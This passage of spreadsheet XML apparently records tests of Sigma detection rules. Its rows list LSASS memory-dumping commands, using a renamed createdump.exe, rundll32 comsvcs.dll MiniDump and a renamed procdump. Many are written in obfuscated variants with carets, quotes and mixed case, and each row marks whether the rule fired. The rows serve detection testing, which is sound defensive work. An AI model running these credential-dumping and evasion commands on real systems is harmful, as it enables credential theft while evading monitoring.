      <c r="B546" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_renamed_createdump</t>
        </is>
      </c>
      <c r="C546" s="36" t="inlineStr">
        <is>
          <t>Renamed CreateDump Utility Execution</t>
        </is>
      </c>
      <c r="D546" s="36" t="inlineStr">
        <is>
          <t>1a1ed54a-2ba4-4221-94d5-01dee560d71e</t>
        </is>
      </c>
      <c r="E546" s="36" t="inlineStr">
        <is>
          <t>copy C:\Windows\Microsoft.NET\Framework64\v4.0.30319\createdump.exe C:\Temp\not_a_dump.exe &amp;&amp; C:\Temp\not_a_dump.exe --full --name /tMp/LSaSs_DUMp.bIn 632</t>
        </is>
      </c>
      <c r="F546" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G546" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H546" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I546" s="43" t="n"/>
      <c r="J546" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K546" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="547" ht="15.75" customHeight="1" s="42">
      <c r="A547" s="43" t="n"/>
      <c r="B547" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_renamed_createdump</t>
        </is>
      </c>
      <c r="C547" s="36" t="inlineStr">
        <is>
          <t>Renamed CreateDump Utility Execution</t>
        </is>
      </c>
      <c r="D547" s="36" t="inlineStr">
        <is>
          <t>1a1ed54a-2ba4-4221-94d5-01dee560d71e</t>
        </is>
      </c>
      <c r="E547" s="36" t="inlineStr">
        <is>
          <t>copy C:\Windows\Microsoft.NET\Framework64\v4.0.30319\createdump.exe C:\Temp\not_a_dump.exe &amp;&amp; C:\Temp\not_a_dump.exe --fulL --name /"tmp/lsass_dump.bin" 632</t>
        </is>
      </c>
      <c r="F547" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G547" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H547" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I547" s="43" t="n"/>
      <c r="J547" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K547" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="548" ht="15.75" customHeight="1" s="42">
      <c r="A548" s="43" t="n"/>
      <c r="B548" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_renamed_createdump</t>
        </is>
      </c>
      <c r="C548" s="36" t="inlineStr">
        <is>
          <t>Renamed CreateDump Utility Execution</t>
        </is>
      </c>
      <c r="D548" s="36" t="inlineStr">
        <is>
          <t>1a1ed54a-2ba4-4221-94d5-01dee560d71e</t>
        </is>
      </c>
      <c r="E548" s="36" t="inlineStr">
        <is>
          <t>copy C:\Windows\Microsoft.NET\Framework64\v4.0.30319\createdump.exe C:\Temp\not_a_dump.exe &amp;&amp; C:\Temp\not_a_dump.exe /"-full" -"-name" /TmP/lSass_dUMp.BIN 632</t>
        </is>
      </c>
      <c r="F548" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G548" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H548" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I548" s="36" t="n"/>
      <c r="J548" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K548" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="549" ht="15.75" customHeight="1" s="42">
      <c r="A549" s="43" t="n"/>
      <c r="B549" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_renamed_createdump</t>
        </is>
      </c>
      <c r="C549" s="36" t="inlineStr">
        <is>
          <t>Renamed CreateDump Utility Execution</t>
        </is>
      </c>
      <c r="D549" s="36" t="inlineStr">
        <is>
          <t>1a1ed54a-2ba4-4221-94d5-01dee560d71e</t>
        </is>
      </c>
      <c r="E549" s="36" t="inlineStr">
        <is>
          <t>copy C:\Windows\Microsoft.NET\Framework64\v4.0.30319\createdump.exe C:\Temp\not_a_dump.exe &amp;&amp; C:\Temp\not_a_dump.exe --full --NaMe /tmp/lsass_dump.bin 632</t>
        </is>
      </c>
      <c r="F549" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G549" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H549" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I549" s="36" t="n"/>
      <c r="J549" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K549" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="550" ht="15.75" customHeight="1" s="42">
      <c r="A550" s="43" t="n"/>
      <c r="B550" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_renamed_createdump</t>
        </is>
      </c>
      <c r="C550" s="36" t="inlineStr">
        <is>
          <t>Renamed CreateDump Utility Execution</t>
        </is>
      </c>
      <c r="D550" s="36" t="inlineStr">
        <is>
          <t>1a1ed54a-2ba4-4221-94d5-01dee560d71e</t>
        </is>
      </c>
      <c r="E550" s="36" t="inlineStr">
        <is>
          <t>copy C:\Windows\Microsoft.NET\Framework64\v4.0.30319\createdump.exe C:\Temp\not_a_dump.exe &amp;&amp; C:\Temp\not_a_dump.exe -"-full" -"-name" /tmp/lsass_dump.bin 632</t>
        </is>
      </c>
      <c r="F550" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G550" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H550" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I550" s="36" t="n"/>
      <c r="J550" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K550" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="551" ht="15.75" customHeight="1" s="42">
      <c r="A551" s="43" t="n"/>
      <c r="B551" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_process_dump_via_comsvcs</t>
        </is>
      </c>
      <c r="C551" s="36" t="inlineStr">
        <is>
          <t>Process Memory Dump Via Comsvcs.DLL</t>
        </is>
      </c>
      <c r="D551" s="36" t="inlineStr">
        <is>
          <t>646ea171-dded-4578-8a4d-65e9822892e3</t>
        </is>
      </c>
      <c r="E551" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /"c" rundll32.exe C:\Windows\System32\com^svcs.dll,Mini^Dump 600 lsass.dmp f^ull</t>
        </is>
      </c>
      <c r="F551" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G551" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H551" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I551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551" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K551" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="552" ht="15.75" customHeight="1" s="42">
      <c r="A552" s="43" t="n"/>
      <c r="B552" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_process_dump_via_comsvcs</t>
        </is>
      </c>
      <c r="C552" s="36" t="inlineStr">
        <is>
          <t>Process Memory Dump Via Comsvcs.DLL</t>
        </is>
      </c>
      <c r="D552" s="36" t="inlineStr">
        <is>
          <t>646ea171-dded-4578-8a4d-65e9822892e3</t>
        </is>
      </c>
      <c r="E552" s="36" t="inlineStr">
        <is>
          <t>cmd.exe -"c" rundll32.exe C:\Windows\System32\com^svcs.dll,Mini^Dump 600 lsass.dmp f^ull</t>
        </is>
      </c>
      <c r="F552" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G552" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H552" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I552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552" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K552" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="553" ht="15.75" customHeight="1" s="42">
      <c r="A553" s="43" t="n"/>
      <c r="B553" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_process_dump_via_comsvcs</t>
        </is>
      </c>
      <c r="C553" s="36" t="inlineStr">
        <is>
          <t>Process Memory Dump Via Comsvcs.DLL</t>
        </is>
      </c>
      <c r="D553" s="36" t="inlineStr">
        <is>
          <t>646ea171-dded-4578-8a4d-65e9822892e3</t>
        </is>
      </c>
      <c r="E553" s="36" t="inlineStr">
        <is>
          <t>rundll32.exe comsvcs.dll,#131096 600 C:\temp\lsass.dmp full</t>
        </is>
      </c>
      <c r="F553" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G553" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H553" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I553" s="43" t="inlineStr">
        <is>
          <t>LSASS Dump Keyword In CommandLine (ffa6861c-4461-4f59-8a41-578c39f3f23e); LSASS Dump Keyword In CommandLine (ffa6861c-4461-4f59-8a41-578c39f3f23e)</t>
        </is>
      </c>
      <c r="J553" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K553" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="554" ht="15.75" customHeight="1" s="42">
      <c r="A554" s="43" t="n"/>
      <c r="B554" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_process_dump_via_comsvcs</t>
        </is>
      </c>
      <c r="C554" s="36" t="inlineStr">
        <is>
          <t>Process Memory Dump Via Comsvcs.DLL</t>
        </is>
      </c>
      <c r="D554" s="36" t="inlineStr">
        <is>
          <t>646ea171-dded-4578-8a4d-65e9822892e3</t>
        </is>
      </c>
      <c r="E554" s="36" t="inlineStr">
        <is>
          <t>rundll32.exe C:\Temp
enamed_file.dll, MiniDump &lt;PID&gt; C:\Temp\dump.bin full</t>
        </is>
      </c>
      <c r="F554" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G554" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H554" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I554" s="43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J554" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K554" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="555" ht="15.75" customHeight="1" s="42">
      <c r="A555" s="43" t="n"/>
      <c r="B555" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_process_dump_via_comsvcs</t>
        </is>
      </c>
      <c r="C555" s="36" t="inlineStr">
        <is>
          <t>Process Memory Dump Via Comsvcs.DLL</t>
        </is>
      </c>
      <c r="D555" s="36" t="inlineStr">
        <is>
          <t>646ea171-dded-4578-8a4d-65e9822892e3</t>
        </is>
      </c>
      <c r="E555" s="36" t="inlineStr">
        <is>
          <t>rundll32.exe C:\Temp enamed_file.dll, MiniDump &lt;PID&gt; C:\Temp\dump.bin full</t>
        </is>
      </c>
      <c r="F555" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G555" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H555" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I555" s="36" t="inlineStr">
        <is>
          <t>Potentially Suspicious CMD Shell Output Redirect (8e0bb260-d4b2-4fff-bb8d-3f82118e6892); Read Contents From Stdin Via Cmd.EXE (241e802a-b65e-484f-88cd-c2dc10f9206d)</t>
        </is>
      </c>
      <c r="J555" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K555" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="556" ht="15.75" customHeight="1" s="42">
      <c r="A556" s="43" t="n"/>
      <c r="B556" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_procdump_evasion</t>
        </is>
      </c>
      <c r="C556" s="36" t="inlineStr">
        <is>
          <t>Potential SysInternals ProcDump Evasion</t>
        </is>
      </c>
      <c r="D556" s="36" t="inlineStr">
        <is>
          <t>79b06761-465f-4f88-9ef2-150e24d3d737</t>
        </is>
      </c>
      <c r="E556" s="36" t="inlineStr">
        <is>
          <t>robocopy C:\Sysinternals C:\temp procdump.exe</t>
        </is>
      </c>
      <c r="F556" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G556" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H556" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I556" s="36" t="n"/>
      <c r="J556" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K556" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="557" ht="15.75" customHeight="1" s="42">
      <c r="A557" s="43" t="n"/>
      <c r="B557" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_procdump_evasion</t>
        </is>
      </c>
      <c r="C557" s="36" t="inlineStr">
        <is>
          <t>Potential SysInternals ProcDump Evasion</t>
        </is>
      </c>
      <c r="D557" s="36" t="inlineStr">
        <is>
          <t>79b06761-465f-4f88-9ef2-150e24d3d737</t>
        </is>
      </c>
      <c r="E557" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c ren procdump.exe pd.exe</t>
        </is>
      </c>
      <c r="F557" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G557" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H557" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I557" s="36" t="n"/>
      <c r="J557" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K557" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="558" ht="15.75" customHeight="1" s="42">
      <c r="A558" s="43" t="n"/>
      <c r="B558" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_procdump_evasion</t>
        </is>
      </c>
      <c r="C558" s="36" t="inlineStr">
        <is>
          <t>Potential SysInternals ProcDump Evasion</t>
        </is>
      </c>
      <c r="D558" s="36" t="inlineStr">
        <is>
          <t>79b06761-465f-4f88-9ef2-150e24d3d737</t>
        </is>
      </c>
      <c r="E558" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /"c" c^opy procdump64.exe C:\temp\svchost.exe</t>
        </is>
      </c>
      <c r="F558" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G558" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H558" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I558" s="36" t="inlineStr">
        <is>
          <t>Potential SysInternals ProcDump Evasion (79b06761-465f-4f88-9ef2-150e24d3d737)</t>
        </is>
      </c>
      <c r="J558" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K558" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="559" ht="15.75" customHeight="1" s="42">
      <c r="A559" s="43" t="n"/>
      <c r="B559" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_procdump_evasion</t>
        </is>
      </c>
      <c r="C559" s="36" t="inlineStr">
        <is>
          <t>Potential SysInternals ProcDump Evasion</t>
        </is>
      </c>
      <c r="D559" s="36" t="inlineStr">
        <is>
          <t>79b06761-465f-4f88-9ef2-150e24d3d737</t>
        </is>
      </c>
      <c r="E559" s="36" t="inlineStr">
        <is>
          <t>cmd.exe -"c" c^opy procdump64.exe C:\temp\svchost.exe</t>
        </is>
      </c>
      <c r="F559" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G559" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H559" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I559" s="36" t="inlineStr">
        <is>
          <t>Potential SysInternals ProcDump Evasion (79b06761-465f-4f88-9ef2-150e24d3d737)</t>
        </is>
      </c>
      <c r="J559" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K559" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="560" ht="15.75" customHeight="1" s="42">
      <c r="A560" s="43" t="n"/>
      <c r="B560" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_procdump_evasion</t>
        </is>
      </c>
      <c r="C560" s="36" t="inlineStr">
        <is>
          <t>Potential SysInternals ProcDump Evasion</t>
        </is>
      </c>
      <c r="D560" s="36" t="inlineStr">
        <is>
          <t>79b06761-465f-4f88-9ef2-150e24d3d737</t>
        </is>
      </c>
      <c r="E560" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /C c^opy procdump64.exe C:\temp\svchost.exe</t>
        </is>
      </c>
      <c r="F560" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G560" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H560" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I560" s="36" t="inlineStr">
        <is>
          <t>Potential SysInternals ProcDump Evasion (79b06761-465f-4f88-9ef2-150e24d3d737)</t>
        </is>
      </c>
      <c r="J560" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K560" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="561" ht="15.75" customHeight="1" s="42">
      <c r="A561" s="43" t="n"/>
      <c r="B561" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_procdump_evasion</t>
        </is>
      </c>
      <c r="C561" s="36" t="inlineStr">
        <is>
          <t>Potential SysInternals ProcDump Evasion</t>
        </is>
      </c>
      <c r="D561" s="36" t="inlineStr">
        <is>
          <t>79b06761-465f-4f88-9ef2-150e24d3d737</t>
        </is>
      </c>
      <c r="E561" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c type lsass.exe_220512_103022.dmp &gt; C:\temp\out.bin</t>
        </is>
      </c>
      <c r="F561" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G561" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H561" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I561" s="36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561" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K561" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="562" ht="15.75" customHeight="1" s="42">
      <c r="A562" s="43" t="n"/>
      <c r="B562" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_procdump_evasion</t>
        </is>
      </c>
      <c r="C562" s="36" t="inlineStr">
        <is>
          <t>Potential SysInternals ProcDump Evasion</t>
        </is>
      </c>
      <c r="D562" s="36" t="inlineStr">
        <is>
          <t>79b06761-465f-4f88-9ef2-150e24d3d737</t>
        </is>
      </c>
      <c r="E562" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /C type lsass.exe_220512_103022.dmp &gt; C:\temp\out.bin</t>
        </is>
      </c>
      <c r="F562" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G562" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H562" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I562" s="36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562" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K562" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="563" ht="15.75" customHeight="1" s="42">
      <c r="A563" s="43" t="n"/>
      <c r="B563" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_procdump_evasion</t>
        </is>
      </c>
      <c r="C563" s="36" t="inlineStr">
        <is>
          <t>Potential SysInternals ProcDump Evasion</t>
        </is>
      </c>
      <c r="D563" s="36" t="inlineStr">
        <is>
          <t>79b06761-465f-4f88-9ef2-150e24d3d737</t>
        </is>
      </c>
      <c r="E563" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /"c" type lsass.exe_220512_103022.dmp &gt; C:\temp\out.bin</t>
        </is>
      </c>
      <c r="F563" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G563" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H563" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I563" s="36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563" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K563" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="564" ht="15.75" customHeight="1" s="42">
      <c r="A564" s="43" t="n"/>
      <c r="B564" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_procdump_evasion</t>
        </is>
      </c>
      <c r="C564" s="36" t="inlineStr">
        <is>
          <t>Potential SysInternals ProcDump Evasion</t>
        </is>
      </c>
      <c r="D564" s="36" t="inlineStr">
        <is>
          <t>79b06761-465f-4f88-9ef2-150e24d3d737</t>
        </is>
      </c>
      <c r="E564" s="36" t="inlineStr">
        <is>
          <t>cmd.exe -"c" type lsass.exe_220512_103022.dmp &gt; C:\temp\out.bin</t>
        </is>
      </c>
      <c r="F564" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G564" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H564" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I564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564" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K564" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="565" ht="15.75" customHeight="1" s="42">
      <c r="A565" s="43" t="n"/>
      <c r="B565" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_procdump_evasion</t>
        </is>
      </c>
      <c r="C565" s="36" t="inlineStr">
        <is>
          <t>Potential SysInternals ProcDump Evasion</t>
        </is>
      </c>
      <c r="D565" s="36" t="inlineStr">
        <is>
          <t>79b06761-465f-4f88-9ef2-150e24d3d737</t>
        </is>
      </c>
      <c r="E565" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Move-Item -Path .\lsass.exe_*.dmp -Destination C:\temp\dump.bin"</t>
        </is>
      </c>
      <c r="F565" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G565" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H565" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I565" s="36" t="inlineStr">
        <is>
          <t>LSASS Dump Keyword In CommandLine (ffa6861c-4461-4f59-8a41-578c39f3f23e); LSASS Dump Keyword In CommandLine (ffa6861c-4461-4f59-8a41-578c39f3f23e)</t>
        </is>
      </c>
      <c r="J565" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K565" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="566" ht="15.75" customHeight="1" s="42">
      <c r="A566" s="43" t="n"/>
      <c r="B566" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_procdump_evasion</t>
        </is>
      </c>
      <c r="C566" s="36" t="inlineStr">
        <is>
          <t>Potential SysInternals ProcDump Evasion</t>
        </is>
      </c>
      <c r="D566" s="36" t="inlineStr">
        <is>
          <t>79b06761-465f-4f88-9ef2-150e24d3d737</t>
        </is>
      </c>
      <c r="E566" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "Move-Item -Path .\lsass.exe_*.dmp -Destination C:\temp\dump.bin"</t>
        </is>
      </c>
      <c r="F566" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G566" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H566" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I566" s="36" t="inlineStr">
        <is>
          <t>LSASS Dump Keyword In CommandLine (ffa6861c-4461-4f59-8a41-578c39f3f23e); LSASS Dump Keyword In CommandLine (ffa6861c-4461-4f59-8a41-578c39f3f23e)</t>
        </is>
      </c>
      <c r="J566" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K566" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="567" ht="15.75" customHeight="1" s="42">
      <c r="A567" s="43" t="n"/>
      <c r="B567" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_procdump_evasion</t>
        </is>
      </c>
      <c r="C567" s="36" t="inlineStr">
        <is>
          <t>Potential SysInternals ProcDump Evasion</t>
        </is>
      </c>
      <c r="D567" s="36" t="inlineStr">
        <is>
          <t>79b06761-465f-4f88-9ef2-150e24d3d737</t>
        </is>
      </c>
      <c r="E567" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -cOmmanD "Move-Item -Path .\lsass.exe_*.dmp -Destination C:\temp\dump.bin"</t>
        </is>
      </c>
      <c r="F567" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G567" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H567" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I567" s="43" t="inlineStr">
        <is>
          <t>LSASS Dump Keyword In CommandLine (ffa6861c-4461-4f59-8a41-578c39f3f23e); LSASS Dump Keyword In CommandLine (ffa6861c-4461-4f59-8a41-578c39f3f23e)</t>
        </is>
      </c>
      <c r="J567" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K567" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="568" ht="15.75" customHeight="1" s="42">
      <c r="A568" s="43" t="n"/>
      <c r="B568" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_procdump_evasion</t>
        </is>
      </c>
      <c r="C568" s="36" t="inlineStr">
        <is>
          <t>Potential SysInternals ProcDump Evasion</t>
        </is>
      </c>
      <c r="D568" s="36" t="inlineStr">
        <is>
          <t>79b06761-465f-4f88-9ef2-150e24d3d737</t>
        </is>
      </c>
      <c r="E568" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -commAND "Move-Item -Path .\lsass.exe_*.dmp -Destination C:\temp\dump.bin"</t>
        </is>
      </c>
      <c r="F568" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G568" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H568" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I568" s="43" t="inlineStr">
        <is>
          <t>LSASS Dump Keyword In CommandLine (ffa6861c-4461-4f59-8a41-578c39f3f23e); LSASS Dump Keyword In CommandLine (ffa6861c-4461-4f59-8a41-578c39f3f23e)</t>
        </is>
      </c>
      <c r="J568" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K568" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="569" ht="15.75" customHeight="1" s="42">
      <c r="A569" s="43" t="n"/>
      <c r="B569" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_procdump_evasion</t>
        </is>
      </c>
      <c r="C569" s="36" t="inlineStr">
        <is>
          <t>Potential SysInternals ProcDump Evasion</t>
        </is>
      </c>
      <c r="D569" s="36" t="inlineStr">
        <is>
          <t>79b06761-465f-4f88-9ef2-150e24d3d737</t>
        </is>
      </c>
      <c r="E569" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -cOmmAND "Move-Item -Path .\lsass.exe_*.dmp -Destination C:\temp\dump.bin"</t>
        </is>
      </c>
      <c r="F569" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G569" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H569" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I569" s="43" t="inlineStr">
        <is>
          <t>LSASS Dump Keyword In CommandLine (ffa6861c-4461-4f59-8a41-578c39f3f23e); LSASS Dump Keyword In CommandLine (ffa6861c-4461-4f59-8a41-578c39f3f23e)</t>
        </is>
      </c>
      <c r="J569" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K569" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="570" ht="15.75" customHeight="1" s="42">
      <c r="A570" s="43" t="n"/>
      <c r="B570" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_procdump_evasion</t>
        </is>
      </c>
      <c r="C570" s="36" t="inlineStr">
        <is>
          <t>Potential SysInternals ProcDump Evasion</t>
        </is>
      </c>
      <c r="D570" s="36" t="inlineStr">
        <is>
          <t>79b06761-465f-4f88-9ef2-150e24d3d737</t>
        </is>
      </c>
      <c r="E570" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Copy-Item .\procdump.exe -Destination .\sysdiag.exe"</t>
        </is>
      </c>
      <c r="F570" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G570" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H570" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I570" s="43" t="n"/>
      <c r="J570" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K570" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="571" ht="15.75" customHeight="1" s="42">
      <c r="A571" s="43" t="n"/>
      <c r="B571" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_procdump_evasion</t>
        </is>
      </c>
      <c r="C571" s="36" t="inlineStr">
        <is>
          <t>Potential SysInternals ProcDump Evasion</t>
        </is>
      </c>
      <c r="D571" s="36" t="inlineStr">
        <is>
          <t>79b06761-465f-4f88-9ef2-150e24d3d737</t>
        </is>
      </c>
      <c r="E571" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "Copy-Item .\procdump.exe -Destination .\sysdiag.exe"</t>
        </is>
      </c>
      <c r="F571" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G571" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H571" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I571" s="43" t="n"/>
      <c r="J571" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K571" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="572" ht="15.75" customHeight="1" s="42">
      <c r="A572" s="43" t="n"/>
      <c r="B572" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_procdump_evasion</t>
        </is>
      </c>
      <c r="C572" s="36" t="inlineStr">
        <is>
          <t>Potential SysInternals ProcDump Evasion</t>
        </is>
      </c>
      <c r="D572" s="36" t="inlineStr">
        <is>
          <t>79b06761-465f-4f88-9ef2-150e24d3d737</t>
        </is>
      </c>
      <c r="E572" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -cOMmAND "Copy-Item .\procdump.exe -Destination .\sysdiag.exe"</t>
        </is>
      </c>
      <c r="F572" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G572" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H572" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I572" s="36" t="n"/>
      <c r="J572" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K572" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="573" ht="15.75" customHeight="1" s="42">
      <c r="A573" s="43" t="n"/>
      <c r="B573" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_procdump_evasion</t>
        </is>
      </c>
      <c r="C573" s="36" t="inlineStr">
        <is>
          <t>Potential SysInternals ProcDump Evasion</t>
        </is>
      </c>
      <c r="D573" s="36" t="inlineStr">
        <is>
